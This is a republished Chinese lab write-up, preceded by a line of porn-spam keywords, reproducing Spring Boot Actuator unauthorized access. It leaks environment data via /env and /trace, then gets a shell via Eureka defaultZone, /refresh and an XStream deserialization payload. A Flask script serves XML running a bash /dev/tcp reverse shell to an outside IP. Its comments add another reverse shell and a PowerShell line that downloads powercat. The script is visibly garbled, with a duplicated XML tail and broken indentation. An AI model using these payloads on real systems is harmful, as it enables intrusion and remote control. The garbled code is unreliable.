国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

漏洞復(fù)現(xiàn) - - - Springboot未授權(quán)訪問(wèn)

這篇具有很好參考價(jià)值的文章主要介紹了漏洞復(fù)現(xiàn) - - - Springboot未授權(quán)訪問(wèn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

一, 未授權(quán)訪問(wèn)是什么?

二,Actuator介紹

三,怎么進(jìn)行漏洞發(fā)現(xiàn)呢?

四,實(shí)驗(yàn)環(huán)境

五,漏洞復(fù)現(xiàn)

1.通過(guò)訪問(wèn)env獲取全部環(huán)境屬性

2.通過(guò)/trace提供基本的http請(qǐng)求跟蹤信息

3.利用反序列化進(jìn)行g(shù)etshell

?1.啟動(dòng)腳本

2.開(kāi)啟監(jiān)聽(tīng)

?3.使用bp抓取一個(gè)/env的包

4.修改POST數(shù)據(jù)


一, 未授權(quán)訪問(wèn)是什么?

未授權(quán)訪問(wèn)漏洞可以理解為需要安全配置或權(quán)限認(rèn)證的地址、授權(quán)頁(yè)面存在缺陷導(dǎo)致其他用戶可以直接訪問(wèn)從而引發(fā)重要權(quán)限可被操作、數(shù)據(jù)庫(kù)或網(wǎng)站目錄等敏感信息泄露

二,Actuator介紹

Spring Boot 基本上是 Spring 框架的擴(kuò)展。?Actuator 是 Springboot 提供的用來(lái)對(duì)應(yīng)用系統(tǒng)進(jìn)行 自省和監(jiān)控的功能模塊,借助于 Actuator ,開(kāi)發(fā)者可以很方便地對(duì)應(yīng)用系統(tǒng)的某些監(jiān)控指標(biāo)進(jìn)行查 看、統(tǒng)計(jì)等。在 Actuator 啟用的情況下,如果沒(méi)有做好相關(guān)權(quán)限控制,非法用戶可通過(guò)訪問(wèn)默認(rèn)的執(zhí)行器端點(diǎn)( endpoints )來(lái)獲取應(yīng)用系統(tǒng)中的監(jiān)控信息。

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-807380.html

三,怎么進(jìn)行漏洞發(fā)現(xiàn)呢?

1.?分析web 應(yīng)用使用的框架為 springboot 框架

2.如果web應(yīng)用開(kāi)發(fā)者沒(méi)有修改springboot web默認(rèn)圖標(biāo)

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

3.如果修改了默認(rèn)圖標(biāo),我們通過(guò)訪問(wèn)refresh web網(wǎng)頁(yè)報(bào)錯(cuò)進(jìn)行分析,如果 web 應(yīng)用開(kāi)發(fā)者沒(méi)有修改 springboot web 應(yīng)用的默認(rèn) 4xx、5xx 報(bào)錯(cuò)頁(yè)面,那么當(dāng) web 應(yīng)用程序出現(xiàn) 4xx、5xx 錯(cuò)誤時(shí),會(huì)報(bào)錯(cuò)如下如圖所示

?

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

四,實(shí)驗(yàn)環(huán)境

靶機(jī):Centos7+springboot?? IP地址:10.1.1.137:8090

攻擊機(jī):Kali? IP地址:10.1.1.135

五,漏洞復(fù)現(xiàn)

1.通過(guò)訪問(wèn)env獲取全部環(huán)境屬性

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

2.通過(guò)/trace提供基本的http請(qǐng)求跟蹤信息

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

3.利用反序列化進(jìn)行g(shù)etshell

需要以下兩個(gè)包(環(huán)境已安裝)

spring-boot-starter-actuator(/refresh刷新配置需要)

spring-cloud-starter-netflix-eureka-client(功能依賴)

采用腳本的方式

# linux反彈shell bash -i >& /dev/tcp/192.168.20.82/9999 0>&1
# windows反彈shell
# <string>powershell</string>
# <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>
# <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string>
from flask import Flask,Response

app =Flask(_name_)

@app.route('/xstream', defaults={ ''})
@app.route('/xstream/<path:path>')
def catch_all(path):
    xml = """<linked-hash-set>
	<jdk.nashorn.internal.objects.NativeString>
	 <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Date">
	 <dataHandler>
	 <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
	 <is class="javax.crypto.CipherInputStream">
	 <cipher class="javax.crypto.NullCipher">
	 <serviceIterator class="javax.imageio.spi.FilterIterator">
     <iter class="javax.imageio.spi.FilterIterator">
	 <iter class="java.util.Collections$EmptyIterator"/>
	 <next class="java.lang.ProcessBuilder">
	<command>
	<string>bash</string>
	<string>-c</string>
	<string>bash -i >&amp; /dev/tcp/139.9.198.30/1234 0>&amp;1</string>      //攻擊機(jī)的IP
	</command>
	<redirectErrorStream>false</redirectErrorStream>
	</next>
	</iter>
	<filter class="javax.imageio.ImageIO$ContainsFilter">
	<method>
	<class>java.lang.ProcessBuilder</class>
    <name>start</name>
	<parameter-types/>
	</method>
    <name>foo</name>
	</filter>
	<next class="string">foo</next>
	</serviceIterator>
	<lock/>
	</cipher>
	<input class="java.lang.ProcessBuilder$NullInputStream"/>
	<ibuffer></ibuffer>
	</is>
	</dataSource>
	</dataHandler>
	 </value>
	</jdk.nashorn.internal.objects.NativeString>
	</linked-hash-set>"""
	 </is>
	</dataSource>
	</dataHandler>
	</value>
	</jdk.nashorn.internal.objects.NativeString>
	</linked-hash-set>"""
	return Response(xml, mimetype='application/xml')
	if __name__ == "__main__":
	app.run(host='0.0.0.0', port=2333)

采用一個(gè)啟動(dòng)腳本的服務(wù)

注意講腳本中的IP改為自己的IP,并且開(kāi)啟一個(gè)監(jiān)聽(tīng)端口

?springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?1.啟動(dòng)腳本

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

2.開(kāi)啟監(jiān)聽(tīng)

?springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?3.使用bp抓取一個(gè)/env的包

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

4.修改POST數(shù)據(jù)

eureka.client.serviceUrl.defaultZone=http://10.1.1.135:2333/xstream

?springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?點(diǎn)擊forward發(fā)送請(qǐng)求

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?訪問(wèn)/refresh,還是顯示一次錯(cuò)誤頁(yè)面。我們對(duì)此進(jìn)行抓包

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

我們講此修改為post請(qǐng)求,數(shù)據(jù)包隨機(jī)輸入就可以?

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?

?查看監(jiān)聽(tīng)的端口,我們可以看到得道了一個(gè)shell,復(fù)現(xiàn)成功?。。?/strong>

springboot未授權(quán)訪問(wèn)漏洞,# 經(jīng)典漏洞復(fù)現(xiàn),安全,網(wǎng)絡(luò)

?

到了這里,關(guān)于漏洞復(fù)現(xiàn) - - - Springboot未授權(quán)訪問(wèn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 服務(wù)攻防-數(shù)據(jù)庫(kù)安全-服務(wù)應(yīng)用的安全問(wèn)題以及測(cè)試流程-Mysql&Hadoop&未授權(quán)訪問(wèn)&RCE-漏洞復(fù)現(xiàn)

    服務(wù)攻防-數(shù)據(jù)庫(kù)安全-服務(wù)應(yīng)用的安全問(wèn)題以及測(cè)試流程-Mysql&Hadoop&未授權(quán)訪問(wèn)&RCE-漏洞復(fù)現(xiàn)

    目錄 一、服務(wù)應(yīng)用的安全問(wèn)題 1、配置不當(dāng)——未授權(quán)訪問(wèn) 2、安全機(jī)制——特定安全漏洞 3、安全機(jī)制——弱口令爆破攻擊 二、服務(wù)應(yīng)用的安全測(cè)試思路 1、判斷服務(wù)是否開(kāi)放 2、判斷服務(wù)類型 3、判斷利用方式 三、Mysql-未授權(quán)訪問(wèn)-CVE-2012-2122 利用 1、漏洞概述 2、漏洞復(fù)現(xiàn)

    2024年02月17日
    瀏覽(30)
  • 【漏洞】【Druid】Druid未授權(quán)訪問(wèn)漏洞,修復(fù)方案。springboot

    漏洞描述: Druid是阿里巴巴數(shù)據(jù)庫(kù)出品的,為監(jiān)控而生的數(shù)據(jù)庫(kù)連接池,并且Druid提供的監(jiān)控功能,監(jiān)控SQL的執(zhí)行時(shí)間、監(jiān)控Web URI的請(qǐng)求、Session監(jiān)控,首先Druid是不存在什么漏洞的。但當(dāng)開(kāi)發(fā)者配置不當(dāng)時(shí)就可能造成未授權(quán)訪問(wèn)。 解決建議: 修改中間件配置 給出的例子,

    2024年02月11日
    瀏覽(30)
  • 在SpringBoot中通過(guò)配置Swagger權(quán)限解決Swagger未授權(quán)訪問(wèn)漏洞

    在SpringBoot中通過(guò)配置Swagger權(quán)限解決Swagger未授權(quán)訪問(wèn)漏洞

    博主 默語(yǔ)帶您 Go to New World. ? 個(gè)人主頁(yè)—— 默語(yǔ) 的博客???? 《java 面試題大全》 ??惟余輩才疏學(xué)淺,臨摹之作或有不妥之處,還請(qǐng)讀者海涵指正。??? 《MYSQL從入門到精通》數(shù)據(jù)庫(kù)是開(kāi)發(fā)者必會(huì)基礎(chǔ)之一~ ?? 吾期望此文有資助于爾,即使粗淺難及深廣,亦備添少許微薄

    2024年04月23日
    瀏覽(24)
  • 【解決問(wèn)題】在SpringBoot中通過(guò)配置Swagger權(quán)限解決Swagger未授權(quán)訪問(wèn)漏洞

    Swagger是一個(gè)規(guī)范和完整的框架,用于生成、描述、調(diào)用和可視化 RESTful 風(fēng)格的 Web 服務(wù)。其中,Swagger-UI會(huì)根據(jù)開(kāi)發(fā)人員在代碼中的設(shè)置來(lái)自動(dòng)生成API說(shuō)明文檔。若存在相關(guān)的配置缺陷,攻擊者可以在未授權(quán)的狀態(tài)下,翻查Swagger接口文檔,得到系統(tǒng)功能API接口的詳細(xì)參數(shù),再

    2024年02月02日
    瀏覽(20)
  • 【Elasticsearch 未授權(quán)訪問(wèn)漏洞復(fù)現(xiàn)】

    【Elasticsearch 未授權(quán)訪問(wèn)漏洞復(fù)現(xiàn)】

    ElasticSearch是一個(gè)基于Lucene的搜索服務(wù)器。它提供了一個(gè)分布式多用戶能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java開(kāi)發(fā)的,并作為Apache許可條款下的開(kāi)放源碼發(fā)布,是當(dāng)前流行的企業(yè)級(jí)搜索引擎。Elasticsearch的增刪改查操作全部由http接口完。由于Elasticsearch授權(quán)

    2024年02月05日
    瀏覽(21)
  • Druid未授權(quán)訪問(wèn) 漏洞復(fù)現(xiàn)

    Druid未授權(quán)訪問(wèn) 漏洞復(fù)現(xiàn)

    Druid是阿里巴巴數(shù)據(jù)庫(kù)事業(yè)部出品,為監(jiān)控而生的數(shù)據(jù)庫(kù)連接池。Druid提供的監(jiān)控功能,監(jiān)控SQL的執(zhí)行時(shí)間、監(jiān)控Web URI的請(qǐng)求、Session監(jiān)控。當(dāng)開(kāi)發(fā)者配置不當(dāng)時(shí)就可能造成未授權(quán)訪問(wèn)漏洞。 1、通過(guò)目錄掃描或手工輸入路徑http://www.xxxx.com/druid/index.html,發(fā)現(xiàn)存在Druid 未授權(quán)訪

    2024年02月11日
    瀏覽(15)
  • Redis未授權(quán)訪問(wèn)漏洞搭建復(fù)現(xiàn)

    Redis未授權(quán)訪問(wèn)漏洞搭建復(fù)現(xiàn)

    今天我們來(lái)學(xué)習(xí)一下什么是Redis未授權(quán)訪問(wèn)漏洞,以及各種利用方法。 文章目錄 一、 什么是Redis未授權(quán)訪問(wèn)漏洞 二、 Redis環(huán)境搭建 三、漏洞利用 四、漏洞總結(jié) 五、漏洞防護(hù) ??????? ?Redis因配置不當(dāng)可以導(dǎo)致未授權(quán)訪問(wèn),被攻擊者惡意利用。當(dāng)前流行的針對(duì)Redis未授權(quán)訪

    2024年02月06日
    瀏覽(21)
  • 漏洞復(fù)現(xiàn) || Hadoop未授權(quán)訪問(wèn)反彈Shell漏洞

    漏洞復(fù)現(xiàn) || Hadoop未授權(quán)訪問(wèn)反彈Shell漏洞

    技術(shù)文章僅供參考,任何個(gè)人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律,遵守公共秩序,尊重社會(huì)公德,不得危害網(wǎng)絡(luò)安全,不得利用網(wǎng)絡(luò)從事危害國(guó)家安全、榮譽(yù)和利益,未經(jīng)授權(quán)請(qǐng)勿利用文章中的技術(shù)資料對(duì)任何計(jì)算機(jī)系統(tǒng)進(jìn)行入侵操作。利用此文所提供的信息而造成的直接或

    2024年02月16日
    瀏覽(15)
  • Hadoop未授權(quán)訪問(wèn) getshell——漏洞復(fù)現(xiàn)

    Hadoop未授權(quán)訪問(wèn) getshell——漏洞復(fù)現(xiàn)

    ?Hadoop未授權(quán)訪問(wèn)漏洞介紹 Hadoop是一個(gè)由Apache基金會(huì)所開(kāi)發(fā)的分布式系統(tǒng)基礎(chǔ)架構(gòu),由于服務(wù)器直接在開(kāi)放了 Hadoop 機(jī)器 HDFS 的 50070 web 端口及部分默認(rèn)服務(wù)端口,黑客可以通過(guò)命令行操作多個(gè)目錄下的數(shù)據(jù),如進(jìn)行刪除,下載,目錄瀏覽甚至命令執(zhí)行等操作,產(chǎn)生極大的危害

    2024年04月16日
    瀏覽(25)
  • 【漏洞復(fù)現(xiàn)】StarRocks MPP數(shù)據(jù)庫(kù)未授權(quán)訪問(wèn)漏洞

    【漏洞復(fù)現(xiàn)】StarRocks MPP數(shù)據(jù)庫(kù)未授權(quán)訪問(wèn)漏洞

    ????????StarRocks 是一個(gè)MPP數(shù)據(jù)庫(kù),具備水平在線擴(kuò)縮容,金融級(jí)高可用,兼容 MySQL 5.7 協(xié)議和 MySQL 生態(tài),提供全面向量化引擎與多種數(shù)據(jù)源聯(lián)邦查詢等重要特性。StarRocks 致力于在全場(chǎng)景 OLAP 業(yè)務(wù)上為用戶提供統(tǒng)一的解決方案,適用于對(duì)性能,實(shí)時(shí)性,并發(fā)能力和靈活性有

    2024年01月17日
    瀏覽(83)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包